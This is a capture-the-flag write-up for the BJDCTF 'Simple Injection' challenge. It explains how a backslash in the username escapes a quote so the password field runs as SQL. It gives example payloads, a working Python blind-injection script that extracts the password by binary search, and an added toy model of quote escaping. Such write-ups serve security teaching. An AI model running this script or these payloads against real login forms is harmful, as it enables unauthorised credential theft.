[BJDCTF 2nd] Simple Injection



hint.txt now shows some content.

The idea is roughly the same as a challenge from the national competition (国赛).

Inject a \ in the username field to escape the single quote, then use integer-type SQL injection in the password field.


For example:

  1. Sending admin\or/**/length(database())>0# echoes the word "stronger".

  2. Sending admin\or/**/length(database())<0# echoes the words "girl friend".

    Even the masters have no girl friend, and neither do I... ah.
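As an added illustration (not the writeup's own code), the following toy model of MySQL's single-quoted literal rules shows why the trailing backslash in username moves the end of that literal into the password field, and why escaping the backslash as well (or, better, a parameterised query) keeps the input inside the literal. The query template and the server's lack of escaping are assumptions; the challenge's server-side code is not shown.

```python
# Added illustration, not the challenge's code. Assumed query shape; the
# server is assumed to interpolate input without escaping. Comments,
# double-quoted literals and NO_BACKSLASH_ESCAPES mode are not modelled.
TEMPLATE = "SELECT * FROM users WHERE username='{u}' AND password='{p}'"

def literal_spans(sql):
    """(start, end) index pairs of single-quoted literals, where a backslash
    escapes the next character and '' is a literal quote (MySQL default)."""
    spans, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            i += 1
            continue
        start = i
        i += 1
        while i < n:
            if sql[i] == "\\":
                i += 2            # escaped char (including \') stays inside
            elif sql[i] == "'" and sql[i + 1:i + 2] == "'":
                i += 2            # doubled quote stays inside
            elif sql[i] == "'":
                break             # closing quote found
            else:
                i += 1
        spans.append((start, min(i, n)))   # unterminated literal runs to end
        i += 1
    return spans

def sql_outside_literals(sql):
    """The parts of the query MySQL would parse as SQL rather than as data."""
    out, pos = [], 0
    for start, end in literal_spans(sql):
        out.append(sql[pos:start])
        pos = end + 1
    out.append(sql[pos:])
    return "".join(out)

def escape_mysql(s):
    """Backslash-aware escaping of the two relevant characters (hypothetical helper)."""
    return s.replace("\\", "\\\\").replace("'", "\\'")

def build_query(username, password, escape=lambda s: s):
    return TEMPLATE.format(u=escape(username), p=escape(password))

# Constructed inputs: the writeup's payload, with and without escaping.
PAYLOAD = "or/**/length(database())>0#"
VULNERABLE = build_query("admin\\", PAYLOAD)
HARDENED = build_query("admin\\", PAYLOAD, escape_mysql)
```

In the unescaped query the password text lands outside every literal, so it is executed as SQL; after backslash-aware escaping both fields stay inside their literals.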


Let's go straight to the script; binary search is fairly fast.

Here I used a ternary operation, with only positive integers and 0, because when I tried negative numbers I found the minus sign was filtered.

```python
import requests

url = "http://bc5d0433-45b5-486d-8fdd-541a8662fd10.node3.buuoj.cn/index.php"

# The trailing backslash in username escapes the closing quote, so the
# password field is parsed as SQL.
data = {"username": "admin\\", "password": ""}
result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    # Binary search the ASCII value of the i-th character (printable range).
    while head < tail:
        mid = (head + tail) >> 1

        #payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
        payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)

        data['password'] = payload
        r = requests.post(url, data=data)

        # "stronger" means the condition held: the character is above mid.
        if "stronger" in r.text:
            head = mid + 1
        else:
            tail = mid

    # ascii('') is 0, so head stays at 32 once the string is exhausted.
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
```

I'm so bad at this; I need to work harder.
